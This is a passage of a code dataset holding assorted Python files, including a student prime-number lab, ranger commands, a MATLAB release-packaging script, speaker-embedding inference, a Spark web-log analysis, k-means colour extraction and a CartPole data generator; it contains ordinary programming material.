it!\")","sub_path":"lab08_minimax-master/lab08_minimax-master/saport/knapsack/solvers/bnb.py","file_name":"bnb.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"178035279","text":"#################################################\n# Lab2\n#################################################\n\nimport cs112_f17_week2_linter\nimport math\n\n#################################################\n# Helper functions\n#################################################\n\n#ShivumAgarwal\n\ndef almostEqual(d1, d2, epsilon=10**-7):\n # note: use math.isclose() outside 15-112 with Python version 3.5 or later\n return (abs(d2 - d1) < epsilon)\n\nimport decimal\ndef roundHalfUp(d):\n # Round to nearest with ties going away from zero.\n rounding = decimal.ROUND_HALF_UP\n # See other rounding options here:\n # https://docs.python.org/3/library/decimal.html#rounding-modes\n return int(decimal.Decimal(d).to_integral_value(rounding=rounding))\n\n# Put your solution to getKthDigit here!\ndef getKthDigit(n, k): \n if (n<0):\n y = abs(n)\n x = (y//(10**k))%10\n return x\n else:\n x = (n//(10**k))%10\n return x\n\n# See if you can rewrite isPrime from lecture here!\ndef isPrime(n):\n if (n < 2):\n return False\n for i in range(2,n):\n if (n % i == 0):\n return False\n return True\n\n#################################################\n\ndef numberLength(x):\n y = abs(x) \n #Accounts for negative numbers\n digits = 0\n #Counter for total digits \n while (y>0):\n y //= 10\n digits += 1\n #keeps dividing number until 0 and digits increments as well\n return digits\n\n\ndef countMatchingDigits(x, y):\n matchingDigits = 0\n #set counter for matching digits\n Xlength = numberLength(x)\n Ylength = numberLength(y)\n #get lengths for both x and y\n for i in range(Xlength):\n #loops through x\n Xdigit = getKthDigit(x,i)\n #gets digit for x\n for j in range(Ylength):\n #loops through y\n Ydigit = getKthDigit(y,j)\n #gets digit for y\n if (Xdigit == Ydigit):\n matchingDigits +=1\n #increments matchingdigits for each instance of match\n \n return matchingDigits \n\n\ndef rotateNumber(x):\n xlength = numberLength(x)\n #set number of digits in x\n if (xlength == 1):\n return x\n #one digit numbers stay the same\n val = x%10\n #gets onesdigit\n y = x//10\n #integer divides original number by ten \n newx = val*10**(xlength-1)+y\n #new number is the sum of val multiplied by 10 to a certain power plus y\n return newx\n\ndef isCircularPrime(x):\n count = 0\n #sets count\n xlength = numberLength(x)\n #sets length\n if (x == 0):\n return False\n #avoides the logic error of 0 being a prime\n if (not isPrime(x)):\n return False\n #prevents even numbers from being recognized as circular primes\n while (count < xlength):\n x = rotateNumber(x)\n if (not isPrime(x)):\n return False \n count +=1\n return True\n #rotates numbers and checks if they're prime\n \n\ndef nthCircularPrime(n):\n found = 0\n guess = 0\n i = 0\n #sets variables for counter and the circular prime numbers/indexes\n while (found <= n):\n if (isCircularPrime(i)):\n guess = i\n found += 1\n i+=1\n #loops until found reaches n and guess is the actual nth circularprime\n return guess\n \ndef reverseNum(n):\n reverse = 0\n #establishes variable for reversed num\n while (n>0):\n onesdigit = n%10\n #gets onesdigit\n reverse = reverse*10+onesdigit\n #adds reverse to opposite of n\n n = n //10\n #int divide n to reach next digit\n return reverse\n \ndef nthEmirpsPrime(n):\n found = 0\n guess = 0\n i = 10\n #sets variables for counter and the circular prime numbers/indexes\n\n while (found <= n): \n if (i == reverseNum(i)):\n i+=1\n #skips instances where reverse of n is the same as n\n if (isPrime(i) and isPrime(reverseNum(i))): \n guess = i\n found += 1 \n #set guess to current value in loop and increments found\n i+=1\n return guess\n \n\n######################################################################\n# ignore_rest: The autograder will ignore all code below here\n######################################################################\n\n#################################################\n# Test Functions\n#################################################\n\ndef testNumberLength():\n print('Testing numberLength()... ', end='')\n assert(numberLength(12) == 2)\n assert(numberLength(3) == 1)\n assert(numberLength(89) == 2)\n assert(numberLength(12345) == 5)\n assert(numberLength(120021) == 6)\n assert(numberLength(5000) == 4)\n print('Passed!')\n\ndef testCountMatchingDigits():\n print('Testing countMatchingDigits()... ', end='')\n assert(countMatchingDigits(1234, 2071) == 2)\n assert(countMatchingDigits(2203, 1527) == 2)\n assert(countMatchingDigits(5, 1253) == 1)\n assert(countMatchingDigits(18737, 7) == 2)\n assert(countMatchingDigits(1220, 7322) == 4)\n assert(countMatchingDigits(1234, 5678) == 0)\n print('Passed!')\n\ndef testRotateNumber():\n print('Testing rotateNumber()... ', end='')\n assert(rotateNumber(1234) == 4123)\n assert(rotateNumber(4123) == 3412)\n assert(rotateNumber(3412) == 2341)\n assert(rotateNumber(2341) == 1234)\n assert(rotateNumber(5) == 5)\n assert(rotateNumber(111) == 111)\n print('Passed!')\n\ndef testIsCircularPrime():\n print('Testing isCircularPrime()... ', end='')\n assert(isCircularPrime(2) == True)\n assert(isCircularPrime(11) == True)\n assert(isCircularPrime(13) == True)\n assert(isCircularPrime(79) == True)\n assert(isCircularPrime(197) == True)\n assert(isCircularPrime(1193) == True)\n print('Passed!')\n\ndef testNthCircularPrime():\n print('Testing nthCircularPrime()... ', end='')\n assert(nthCircularPrime(0) == 2)\n assert(nthCircularPrime(4) == 11)\n assert(nthCircularPrime(5) == 13)\n assert(nthCircularPrime(11) == 79)\n assert(nthCircularPrime(15) == 197)\n assert(nthCircularPrime(25) == 1193)\n print('Passed!')\n\ndef testNthEmirpsPrime():\n print('Testing nthEmirpsPrime()... ', end='')\n assert(nthEmirpsPrime(0) == 13)\n assert(nthEmirpsPrime(5) == 73)\n assert(nthEmirpsPrime(10) == 149)\n assert(nthEmirpsPrime(20) == 701)\n assert(nthEmirpsPrime(30) == 941)\n print('Passed.')\n\n#################################################\n# testAll and main\n#################################################\n\ndef testAll():\n testNumberLength()\n testCountMatchingDigits()\n testRotateNumber()\n testIsCircularPrime()\n testNthCircularPrime()\n testNthEmirpsPrime()\n\ndef main():\n cs112_f17_week2_linter.lint() # check style rules\n testAll()\n\nif __name__ == '__main__':\n main()\n","sub_path":"Python Problems -SA/Week 2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"382706281","text":"# encoding: utf-8\n# This is a sample commands.py. You can add your own commands here.\n#\n# Please refer to commands_full.py for all the default commands and a complete\n# documentation. Do NOT add them all here, or you may end up with defunct\n# commands when upgrading ranger.\n\n# You always need to import ranger.api.commands here to get the Command class:\nfrom ranger.api.commands import *\n\n# A simple command for demonstration purposes follows.\n# -----------------------------------------------------------------------------\n\n# You can import any python module as needed.\nimport os\n\nclass rename_images(Command):\n # The so-called doc-string of the class will be visible in the built-in\n # help that is accessible by typing \"?c\" inside ranger.\n \"\"\":rename_images\n\n Batch renaming images based on filename order\n \"\"\"\n\n # The execute method is called when you run this command in ranger.\n def execute(self):\n d = self.fm.thisfile\n \n if d.is_directory:\n renamecmd = [ os.path.expanduser(\"~/.config/ranger/rename_images.zsh\"), str(d) ]\n self.fm.run( renamecmd )\n else:\n self.fm.notify(\"Not a directory!\")\n\nclass grename(Command):\n \"\"\":grename\n\n Rename gallery directory\n \"\"\"\n\n def execute(self):\n from ranger import MACRO_DELIMITER, MACRO_DELIMITER_ESC\n\n d = self.fm.thisfile\n\n if d.is_directory:\n basename = d.basename.replace(MACRO_DELIMITER, MACRO_DELIMITER_ESC)\n new_name = \"-\".join(basename.split(\"–\")[-1].strip().split()[0:-1]).lower()\n self.fm.open_console(\"rename \" + new_name)\n else:\n self.fm.notify(\"Not a directory\")\n","sub_path":".config/ranger/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501503385","text":"\r\nclass Solution(object):\r\n \"\"\"\r\n Find the kth largest element in an unsorted array.\r\n Note that it is the kth largest element in the sorted order, not the kth distinct element.\r\n\r\n For example,\r\n Given [3,2,1,5,6,4] and k = 2, return 5.\r\n\r\n Note:\r\n You may assume k is always valid, 1 ≤ k ≤ array's length.\r\n \"\"\"\r\n def findKthLargest(self, nums, k):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type k: int\r\n :rtype: int\r\n \"\"\"\r\n ret = []\r\n for e in nums:\r\n ret.append(e)\r\n if len(ret) > k:\r\n ret.sort()\r\n ret.pop(0)\r\n print(nums, ret[0])\r\n return ret[0]\r\n\r\nif __name__ == \"__main__\":\r\n a = Solution()\r\n a.findKthLargest([3,2,1,5,6,4], 2)\r\n a.findKthLargest([3,2,1,5,6,4], 4)\r\n","sub_path":"leet/215.KthLargestElementInAnArray.py","file_name":"215.KthLargestElementInAnArray.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"9037533","text":"#!/usr/bin/python\r\n\r\nimport os\r\nimport sys\r\nimport time\r\nimport shutil\r\nimport ziputil\r\n\r\n# official.py\r\n# Exports the IMOS Toolbox from SVN and\r\n#\r\n# - Creates an archive of the source \r\n# - Runs Util/imosPackage.m to to package the source\r\n# \r\n# These files are submitted back to the project as file downloads.\r\n#\r\n# python, svn (SlikSvn), scp and matlab must be on PATH\r\n#\r\n\r\nlt = time.localtime()\r\nat = time.asctime()\r\n\r\nproject = 'imos-toolbox'\r\n\r\ndef submit(archive):\r\n\r\n user = 'ggalibert'\r\n server = '10-nsp-mel.emii.org.au'\r\n dir = '/mnt/imos-t4/IMOS/public/eMII/softwares/imos-toolbox'\r\n http_url = 'http://data.aodn.org.au/IMOS/public/eMII/softwares/imos-toolbox/'\r\n\r\n print('\\n--submitting %s to %s' % (archive,http_url))\r\n cmd = 'scp %s %s@%s:%s' % (archive,user,server,dir)\r\n \r\n os.system(cmd)\r\n\r\nversion = '2.4'\r\n \r\nurl = 'https://github.com/aodn/%s.git' % project\r\nexportDir = 'export'\r\nstdArchive = 'imos-toolbox-%s.zip' % version\r\n\r\ncompilerLog = './%s/log.txt' % exportDir\r\n\r\n#\r\n# export from SVN\r\n#\r\nprint('\\n--exporting tree from %s to %s' % (url, exportDir))\r\nos.system('git clone %s %s' % (url, exportDir))\r\n\r\n#\r\n# remove snapshot directory\r\n#\r\nprint('\\n--removing snapshot')\r\nshutil.rmtree('%s/snapshot' % exportDir)\r\n\r\n#\r\n# create snapshot\r\n#\r\nprint('\\n--creating snapshot')\r\nmatlabOpts = '-nodisplay -wait -logfile \"%s\"' % compilerLog\r\nmatlabCmd = \"addpath('Util'); try, imosPackage(); exit(); catch e, disp(e.message); end;\"\r\nos.system('cd %s && matlab %s -r \"%s\"' % (exportDir, matlabOpts, matlabCmd))\r\nshutil.copy('%s/imos-toolbox.zip' % exportDir, './%s' % stdArchive)\r\n\r\ntry:\r\n submit(stdArchive)\r\n\r\nexcept:\r\n print('\\n--Snapshot upload error. Check script, fix and then delete previous files before running new snapshot')\r\n\r\nprint('\\n--removing local git tree and archives')\r\nshutil.rmtree('%s' % exportDir)\r\nos.remove(stdArchive)\r\n","sub_path":"snapshot/official.py","file_name":"official.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"29473577","text":"from encoder.params_data import *\nfrom encoder.model import SpeakerEncoder\nfrom encoder.audio import preprocess_wav # We want to expose this function from here\nfrom matplotlib import cm\nfrom encoder import audio\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport torch\n\n_model = None # type: SpeakerEncoder\n_device = None # type: torch.device\n\n#load_model(\"./app/insert/encoder/saved_models/pretrained.pt\")\ndef load_model(weights_fpath: Path, device=None):\n '''\n This Method loads the model \n PARAMS:\n weights_fpath: The path to the weights of the pretrained model(Must be a Path object) \n '''\n global _model, _device\n if device is None:\n _device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n elif isinstance(device, str):\n _device = torch.device(device)\n _model =SpeakerEncoder(_device, torch.device(\"cpu\"))\n checkpoint = torch.load(weights_fpath)\n _model.load_state_dict(checkpoint[\"model_state\"])\n _model.eval()\n \n\n\ndef computeEmbeddingForBatch(framesInBatches):\n '''\n This method computes the embedding for a batch of partial utterances\n it done so by feeding the batch of frames(in mel spectogram) \n to the network\n '''\n if _model is None:\n raise Exception(\"Model was not loaded. Call load_model() before inference.\")\n \n frames = torch.from_numpy(framesInBatches).to(_device)\n embed = _model.forward(frames).detach().cpu().numpy()\n return embed\n\n\ndef computeSlices(n_samples, partial_utterance_n_frames=partials_n_frames,\n min_pad_coverage=0.75, overlap=0.5):\n '''\n This Method computes for the utterance and the mel spectorgram that will be obtained from it,\n the begining and end of every slice.\n This method returns two lists of slices:\n 1-wav slices:where to slice the wav every element of this list is a slice object \n 2-mel slices:where to slice the mel \n '''\n assert 0 <= overlap < 1\n assert 0 < min_pad_coverage <= 1\n numSamplesInFrame = int((sampling_rate * mel_window_step / 1000))#This number is divided by 1000 because the unit in sampling rate is sample/sec\n totalFrames = int(np.ceil((n_samples + 1) / numSamplesInFrame))#total number of frames\n frameStep = max(int(np.round(partial_utterance_n_frames * (1 - overlap))), 1)#This variable represents the step we need to move from one partial utterance to the other one\n # Compute the slices\n wSlices, mSlices = [], []#a list that will contain the slices of the wav and mel spectograms respectively\n numPartialUtterances = max(1, totalFrames - partial_utterance_n_frames + frameStep + 1)#this variable represents the number of partial utterances in the wav\n for i in range(0, numPartialUtterances, frameStep):\n mRange = np.array([i, i + partial_utterance_n_frames])# \"i\" represents the start frame of this partial utterance and i+partial_utterance_n_frames represents the end frame\n wRange = mRange * numSamplesInFrame #the start of this range is the start sample number and end is the end sample number \n mSlices.append(slice(*mRange))\n wSlices.append(slice(*wRange))\n # Evaluate whether extra padding is warranted or not\n last_wav_range = wSlices[-1]\n coverage = (n_samples - last_wav_range.start) / (last_wav_range.stop - last_wav_range.start)\n if coverage < min_pad_coverage and len(mSlices) > 1:\n mSlices = mSlices[:-1]\n wSlices = wSlices[:-1]\n return wSlices, mSlices\n\n\ndef computeEmbedding(wav, **kwargs):\n '''\n This Method computes the embedding vector for the wav paramater\n\n PARAMS:\n wav:the preprocessed wav file for which the e-vector will be calculated\n\n RETURNS:\n the embedding of the wav object \n '''\n \n # If the last slice size is larger than the length of the wav then we \n #must zero-pad the wav \n wSlices, mSlices = computeSlices(len(wav), **kwargs)\n lastSliceStop = wSlices[-1].stop\n if lastSliceStop >= len(wav):\n wav = np.pad(wav, (0, lastSliceStop - len(wav)), \"constant\")\n #compute the mel spectogram of the wav\n frames = audio.wav_to_mel_spectrogram(wav)\n #group every mslice into an array which will be fed to the network\n framesInBatches = np.array([frames[s] for s in mSlices])\n #for every member in partialEmbeddings is the e-vector for the partial utterance \n partialEmbeddings = computeEmbeddingForBatch(framesInBatches)\n # The embedding vector of the complete utterance will be the normalization of the averaged version\n averageEmbedding = np.mean(partialEmbeddings, axis=0)\n embed = averageEmbedding / np.linalg.norm(averageEmbedding, 2)\n return embed\n\n\n\n","sub_path":"app/insert/encoder/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":4705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515744387","text":"# coding=utf-8\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.contrib.sites.models import Site\nfrom quizme.core.utils import send_email\nfrom .models import Receipt\n\n\n@receiver(post_save, sender=Receipt)\ndef email_receipt(sender, **kwargs):\n\tif kwargs['created']:\n\t\tr = kwargs['instance']\n\n\t\tsend_email(\n\t\t\tsubject = 'Kvitto på ditt köp från QuizMe.se',\n\t\t\ttemplate_name = 'receipt',\n\t\t\temail = r.account.email,\n\t\t\tcontext = {\n\t\t\t\t'receipt': r, \n\t\t\t\t'site_url': Site.objects.get_current().domain\n\t\t\t}\n\t\t)\n","sub_path":"receipt/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"363445548","text":"import glob\nimport os\nfrom scipy.ndimage import imread\nimport numpy\nimport pickle\nfrom PIL import Image\n\ngtdir = '1st_manual'\nr1 = 3\nr2 = 4\n\n\nfor fGT in glob.glob(os.path.join(gtdir,'*_manual1.gif.composite.png')):\n img = imread(fGT)\n H,W,C = img.shape\n\n new_gt = numpy.zeros((H,W,5))\n for i in range(H):\n for j in range(W):\n if img[i,j,0]==0:\n new_gt[i,j] = [1,0,0,0,0]\n for i in range(H):\n for j in range(W):\n if img[i,j,0]>0 and img[i,j,1]>0:\n new_gt[i,j] = [0,0,0,0,1]\n for a in range(-3,4):\n for b in range(-3,4):\n if a ** 2 + b ** 2 < r1**2 and img[i+a,j+b,0]==0:\n new_gt[i+a,j+b] = [0,0,1,0,0]\n if img[i,j,0]>0 and img[i,j,1]==0:\n new_gt[i,j] = [0,0,0,1,0]\n for a in range(-3,4):\n for b in range(-3,4):\n if a**2+b**2 None:\n super(SignalRFeature, self).__init__(**kwargs)\n self.value = value\n self.properties = properties\n","sub_path":"sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/models/signal_rfeature_py3.py","file_name":"signal_rfeature_py3.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"89839938","text":"# Spark - Resolução\r\n\r\n\r\n### 1. Número de hosts únicos\r\ntxt_log = sc.textFile(\"hdfs:///user/cloudera/semantix/access_log_Jul95,hdfs:///user/cloudera/semantix/access_log_Aug95\")\r\n\r\nhosts = txt_log.map(lambda cols: cols.split(\" - - \")).map(lambda cols: (cols[0],1)).reduceByKey(lambda a,b: a + b) \r\n\r\nhosts.keys().count()\r\n#137979\r\n###\r\n\r\n\r\n### 2. Total de errors 404\r\nstep1 = txt_log.map(lambda cols: cols.split('] \"'))\r\n\r\nstep2 = step1.map(lambda cols: cols[1] if(cols is not None and len(cols) > 1) else None)\r\n\r\nstep3 = step2.map(lambda cols: cols.split('\" ') if(cols is not None and len(cols.split('\" ')) > 1) else None)\r\n\r\nrtnHttp_RtnBytes = step3.map(lambda cols: cols[1].split(' ') if(cols is not None and len(cols[1].split(' ')) > 1) else None)\r\n\r\nstep5 = rtnHttp_RtnBytes.map(lambda cols: (cols[0] if(cols is not None) else \"-999\",1)).reduceByKey(lambda a,b: a + b)\r\n\r\nstep5.collect()\r\n#Foram 20873 retornos 404\r\n#[('-999', 31), (u'304', 266773), (u'403', 224), (u'200', 3100521), (u'302', 73070), (u'500', 65), (u'501', 41), (u'404', 20873), (u'400', 15)]\r\n###\r\n\r\n\r\n### 3. Os 5 URLs que mais causaram erro 404\r\nurls404 = step3.filter(lambda cols: (cols[1].split(' ')[0] if(cols is not None and len(cols[1].split(' ')) > 1) else None) == \"404\")\r\n\r\nurls404Quebrado = urls404.map(lambda cols: cols[0].split(' '))\r\n\r\nurls404ChaveValor = urls404Quebrado.map(lambda cols: (cols[1],1))\r\n\r\nurls404Contagem = urls404ChaveValor.reduceByKey(lambda a, b: a + b)\r\n\r\nurls404Contagem.takeOrdered(5, key = lambda r: -r[1])\r\n#[(u'/pub/winvn/readme.txt', 2004), (u'/pub/winvn/release.txt', 1732), (u'/shuttle/missions/STS-69/mission-STS-69.html', 683), (u'/shuttle/missions/sts-68/ksc-upclose.gif', 428), (u'/history/apollo/a-001/a-001-patch-small.gif', 384)]\r\n###\r\n\r\n### 4. Quantidade de erros 404 por dia.\r\nurls404ComTimestamp = step1.filter(lambda cols: (cols[1].split('\" ')[1].split(' ')[0] if(cols is not None and len(cols) > 1 and cols[1] is not None and len(cols[1].split('\" ')) > 1) and cols[1].split('\" ')[1] is not None and cols[1].split('\" ')[1].split(\" \") is not None and len(cols[1].split('\" ')[1].split(\" \")) > 1 else None) == \"404\")\r\n\r\nurls404ComTimestampQuebra = urls404ComTimestamp.map(lambda cols: cols[0].split(\" - - [\"))\r\n\r\nurls404ComTimestampQuebraZona = urls404ComTimestampQuebra.map(lambda cols: cols[1].split(\" \"))\r\n\r\nfrom datetime import datetime\r\n\r\nurls404ComTimestampContagem = urls404ComTimestampQuebraZona.map(lambda cols: (datetime.strptime(cols[0], \"%d/%b/%Y:%H:%M:%S\").date(),1))\r\n\r\nurls404ComTimestampContagemConsolidado = urls404ComTimestampContagem.reduceByKey(lambda a, b: a + b)\r\n\r\nurls404ComTimestampContagemTotal = urls404ComTimestampContagemConsolidado.values().reduce(lambda a,b:a+b)\r\n\r\nurls404ComTimestampContagemTotal / urls404ComTimestampContagemConsolidado.keys().count()\r\n#Em media são 359 erros 404 por dia\r\n###\r\n\r\n### 5. O total de bytes retornados\r\nrtnBytes = rtnHttp_RtnBytes.map(lambda cols: int(cols[1] if(cols is not None and cols[1] is not None and cols[1] != '-') else 0) ).reduce(lambda a,b:a+b)\r\n\r\nprint(rtnBytes)\r\n#Foram 65524307881 de bytes retornados\r\n###\r\n\r\n\r\n\r\n\r\n","sub_path":"codigo_spark.py","file_name":"codigo_spark.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"569341096","text":"from django.core.management.base import BaseCommand\nfrom oscico.settings_local import BASE_DIR #LOCAL SETTING !!!!!!!\nfrom topics.models import SubTopic\n\nfrom collections import namedtuple\nfrom math import sqrt\nimport random\n\n\nimport struct\n\n\n#https://charlesleifer.com/blog/using-python-and-k-means-to-find-the-dominant-colors-in-images/\n\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\n\nPoint = namedtuple('Point', ('coords', 'n', 'ct'))\nCluster = namedtuple('Cluster', ('points', 'center', 'n'))\n\ndef get_points(img):\n points = []\n w, h = img.size\n for count, color in img.getcolors(w * h):\n points.append(Point(color, 3, count))\n return points\n\ndef calculate_center(points, n):\n vals = [0.0 for i in range(n)]\n plen = 0\n for p in points:\n plen += p.ct\n for i in range(n):\n vals[i] += (p.coords[i] * p.ct)\n return Point([(v / plen) for v in vals], n, 1)\n\ndef euclidean(p1, p2):\n return sqrt(sum([\n (p1.coords[i] - p2.coords[i]) ** 2 for i in range(p1.n)\n ]))\n\ndef kmeans(points, k, min_diff):\n clusters = [Cluster([p], p, p.n) for p in random.sample(points, k)]\n\n while 1:\n plists = [[] for i in range(k)]\n\n for p in points:\n smallest_distance = float('Inf')\n for i in range(k):\n distance = euclidean(p, clusters[i].center)\n if distance < smallest_distance:\n smallest_distance = distance\n idx = i\n plists[idx].append(p)\n\n diff = 0\n for i in range(k):\n old = clusters[i]\n center = calculate_center(plists[i], old.n)\n new = Cluster(plists[i], center, old.n)\n clusters[i] = new\n diff = max(diff, euclidean(old.center, new.center))\n\n if diff < min_diff:\n break\n\n return clusters\n\nrtoh = lambda rgb: '#%s' % ''.join(('%02x' % p for p in rgb))\n\n\ndef colorz(filename, n=3):\n img = Image.open(filename)\n img.thumbnail((200, 200))\n w, h = img.size\n\n points = get_points(img)\n clusters = kmeans(points, n, 1)\n rgbs = [map(int, c.center.coords) for c in clusters]\n\n return list(map(rtoh, rgbs))\n\n\ndef HexToRGB(hex_color):\n h = '0x'+hex_color.lstrip('#')\n h1, h2, h3 = h[0:4], '0x' + h[4:6], '0x' + h[6:8]\n r, g , b = int(h1, 16), int(h2, 16), int(h3, 16)\n return (r, g, b)\n\n\n# https://docs.djangoproject.com/en/1.8/howto/custom-management-commands/\n\n\nclass Command(BaseCommand):\n help = 'Updating the hexadecimal background colour associated with a logo'\n\n def handle(self, *args, **options):\n\n #make initial default color\n try:\n Color.objects.get(pk=1)\n except Color.DoesNotExist:\n c = Color(pk=1, logo_hex=\"#000000\", logo_r=0, logo_g=0, logo_b=0, text_hex=\"#ffffff\")\n c.save()\n\n\n\n for subtopic in SubTopic.objects.all():\n if subtopic.logo:\n img_filename = BASE_DIR+subtopic.logo.url\n three_main_hex_colors = colorz(img_filename)\n main_hex_color = three_main_hex_colors[0]\n r, g, b, = HexToRGB(main_hex_color)\n\n color = Color(logo_hex = main_hex_color, logo_r = r, logo_g = g, logo_b = b)\n color.save()\n subtopic.color = color\n subtopic.save()\n\n self.stdout.write('All subtopic logo image colors have been add successfully')\n","sub_path":"topics/management/commands/updateLogoColor.py","file_name":"updateLogoColor.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313042530","text":"import pandas as pd\n\n\nimport sys\n\n\ninput_matrix =sys.argv[1]\n\n\nintensity_detected = pd.read_csv(input_matrix)\nintensity_detected.index = intensity_detected['Metabolite']\ndel intensity_detected['Metabolite']\n\nflux_metabolites = intensity_detected.index.tolist()\n\nzero_index = []\nfor index,metabolite in enumerate(flux_metabolites):\n #print(index,metabolite)\n if metabolite.split('-').pop() == '0':\n #print(index,\"This is 0th ################\")\n zero_index.append(index)\n\n \ntotal_index_zip = []\nfor i,item in enumerate(zero_index):\n if i != 0:\n get_previous=zero_index[i-1]\n paired_index_subset = [get_previous,item]\n total_index_zip.append(paired_index_subset)\n\nlast_search = [zero_index[-1],len(flux_metabolites)]\ntotal_index_zip.append(last_search)\n\n\nmyDataFrame = []\nfor x,y in total_index_zip:\n flux_search = (flux_metabolites[x:y])\n flux_search_0_removed = flux_search[1:]\n test = (intensity_detected[intensity_detected.index.isin(flux_search)])\n test_removed = (intensity_detected[intensity_detected.index.isin(flux_search_0_removed)])\n new_final_test = test_removed.sum(axis=0) / test.sum(axis=0) * 100\n new_final_df = pd.DataFrame(new_final_test).transpose()\n new_final_df.index = [flux_search[0]]\n #print(pd.DataFrame(new_final_df))\n myDataFrame.append(new_final_df)\n\n\noutput_name = input_matrix.split('/')[0] + '/' + input_matrix.split('/')[1] + '/'+ 'flux.output.csv'\n\nappended_data = pd.concat(myDataFrame, axis=0)\nappended_data = appended_data.round(2)\n\nappended_data.to_csv(output_name) \nprint(\"Flux Analysis Complete\")\n","sub_path":"scripts/flux.py","file_name":"flux.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485583079","text":"import os\nimport gym\nimport numpy as np\nimport sys\nimport time\n\n\ndef create_training_data(\n episodes, \n max_steps,\n min_reward_for_training_data,\n watch_game=True\n ):\n \"\"\" \n creates training data for tf.estimator\n \"\"\"\n env = gym.make(\"CartPole-v1\")\n\n data = []\n labels = []\n tot_rewards = []\n\n for i_episode in range(episodes):\n print(f\"playing episode {i_episode}\")\n observation = env.reset()\n rewards = 0\n observations = []\n actions = []\n\n for t in range(max_steps):\n # plays game at human speeds\n # do not use when generating training data\n if watch_game:\n time.sleep(0.03)\n env.render()\n print(observation)\n\n action = env.action_space.sample()\n observation, reward, done, info = env.step(action)\n\n observations.append(observation)\n actions.append(action)\n rewards += reward\n\n # game should stop before rewards-check\n # don't want to train on data that causes game to end\n if rewards >= min_reward_for_training_data:\n for obs in observations:\n data.append(observation)\n for a in actions:\n labels.append(a)\n\n if done:\n break\n\n data = np.array(data)\n labels = np.array(labels)\n\n return data, labels\n\n\nif __name__ == \"__main__\":\n \n # settings\n name = sys.argv[0]\n episodes = 10\n max_steps = 1000\n min_reward_for_training_data = 0\n\n if len(sys.argv) > 1:\n episodes = int(sys.argv[1])\n max_steps = int(sys.argv[2])\n\n data, labels = create_training_data(\n episodes, \n max_steps, \n min_reward_for_training_data, \n watch_game=False\n )\n\n data_filename = \"data.npy\"\n labels_filename = \"labels.npy\"\n\n training_data_dir = \"training_data\"\n\n if not os.path.exists(training_data_dir):\n os.mkdir(training_data_dir)\n\n data_path = os.path.join(training_data_dir, data_filename)\n labels_path = os.path.join(training_data_dir, labels_filename)\n\n np.save(data_path, data)\n np.save(labels_path, labels)","sub_path":"cart_pole/create_training_data.py","file_name":"create_training_data.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"209757423","text":"import json\nimport numpy as np\n\nfrom torchmoji.sentence_tokenizer import SentenceTokenizer\nfrom torchmoji.model_def import torchmoji_feature_encoding\n\n\nVOCAB_PATH = 'model/vocabulary.json'\nPRETRAINED_PATH = 'model/pytorch_model.bin'\n\nTEST_SENTENCES = ['I love mom\\'s cooking',\n 'I love how you never reply back..',\n 'I love cruising with my homies',\n 'I love messing with yo mind!!',\n 'I love you and now you\\'re just gone..',\n 'This is shit',\n 'This is the shit']\n\n\nmaxlen = 30\nbatch_size = 32\n\nwith open(VOCAB_PATH, 'r') as f:\n vocabulary = json.load(f)\n\nst = SentenceTokenizer(vocabulary, maxlen)\n\nprint('Loading model from {}.'.format(PRETRAINED_PATH))\nmodel = torchmoji_feature_encoding(PRETRAINED_PATH)\nprint(model)\ntokenized, _, _ = st.tokenize_sentences(TEST_SENTENCES)\nencoding = model(tokenized)\n\navg_across_sentences = np.around(np.mean(encoding, axis=0)[:5], 3)\n\nprint('printing results')\nprint(avg_across_sentences)\n\nassert np.allclose(avg_across_sentences, np.array([-0.023, 0.021, -0.037, -0.001, -0.005]))","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"608804854","text":"import streamlit as st\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\n\r\nst.title(\"Red wine prediction system\")\r\n\r\ncol1, col2, col3 = st.beta_columns(3)\r\n\r\nfixed_acidity = np.float(col1.text_input(\"Fixed Acidity\",7.4))\r\nvolatile_acidity = np.float(col2.text_input(\"Volatile Acidity\",0.7))\r\ncitric_acidity = np.float(col3.text_input(\"Citric Acid\",0))\r\nresidual_sugar = np.float(col1.text_input(\"Residual Sugar\",1.9))\r\nchlorides = np.float(col2.text_input(\"Chlorides\",0.076))\r\nfree_sulphur_dioxide =np.float(col3.text_input(\"Free Sulphur 